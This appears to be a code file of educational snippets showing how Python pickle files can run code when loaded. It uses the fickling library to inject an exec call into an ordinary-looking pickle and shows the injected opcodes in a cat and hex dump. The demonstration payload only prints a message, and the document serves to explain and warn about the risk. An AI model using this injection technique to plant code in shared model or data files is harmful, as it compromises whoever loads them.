File size: 2,695 Bytes
4b8f474 |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 |
import pickle
import pickletools
var = "data I want to share with a friend"
# store the pickle data in a file named 'payload.pkl'
with open('payload.pkl', 'wb') as f:
pickle.dump(var, f)
# disassemble the pickle
# and print the instructions to the command line
with open('payload.pkl', 'rb') as f:
pickletools.dis(f) 0: \x80 PROTO 4
2: \x95 FRAME 48
11: \x8c SHORT_BINUNICODE 'data I want to share with a friend'
57: \x94 MEMOIZE (as 0)
58: . STOP
highest protocol among opcodes = 4import pickle
import pickletools
class Data:
def __init__(self, important_stuff: str):
self.important_stuff = important_stuff
d = Data("42")
with open('payload.pkl', 'wb') as f:
pickle.dump(d, f)from fickling.pickle import Pickled
import pickle
# Create a malicious pickle
data = "my friend needs to know this"
pickle_bin = pickle.dumps(data)
p = Pickled.load(pickle_bin)
p.insert_python_exec('print("you\'ve been pwned !")')
with open('payload.pkl', 'wb') as f:
p.dump(f)
# innocently unpickle and get your friend's data
with open('payload.pkl', 'rb') as f:
data = pickle.load(f)
print(data)you've been pwned !
my friend needs to know this# cat payload.pkl
c__builtin__
exec
(Vprint("you've been pwned !")
tR my friend needs to know this.%
# hexyl payload.pkl
ββββββββββ¬ββββββββββββββββββββββββββ¬ββββββββββββββββββββββββββ¬βββββββββ¬βββββββββ
β00000000β 63 5f 5f 62 75 69 6c 74 β 69 6e 5f 5f 0a 65 78 65 βc__builtβin___exeβ
β00000010β 63 0a 28 56 70 72 69 6e β 74 28 22 79 6f 75 27 76 βc_(Vprinβt("you'vβ
β00000020β 65 20 62 65 65 6e 20 70 β 77 6e 65 64 20 21 22 29 βe been pβwned !")β
β00000030β 0a 74 52 80 04 95 20 00 β 00 00 00 00 00 00 8c 1c β_tRΓβ’Γ 0β000000Γβ’β
β00000040β 6d 79 20 66 72 69 65 6e β 64 20 6e 65 65 64 73 20 βmy frienβd needs β
β00000050β 74 6f 20 6b 6e 6f 77 20 β 74 68 69 73 94 2e βto know βthisΓ. β
ββββββββββ΄ββββββββββββββββββββββββββ΄ββββββββββββββββββββββββββ΄βββββββββ΄βββββββββ# ...
opcodes_stack = [exec_func, "malicious argument", "REDUCE"]
opcode = stack.pop()
if opcode == "REDUCE":
arg = opcodes_stack.pop()
callable = opcodes_stack.pop()
opcodes_stack.append(callable(arg))
# ...from transformers import AutoModel
model = AutoModel.from_pretrained("bert-base-cased", from_flax=True) |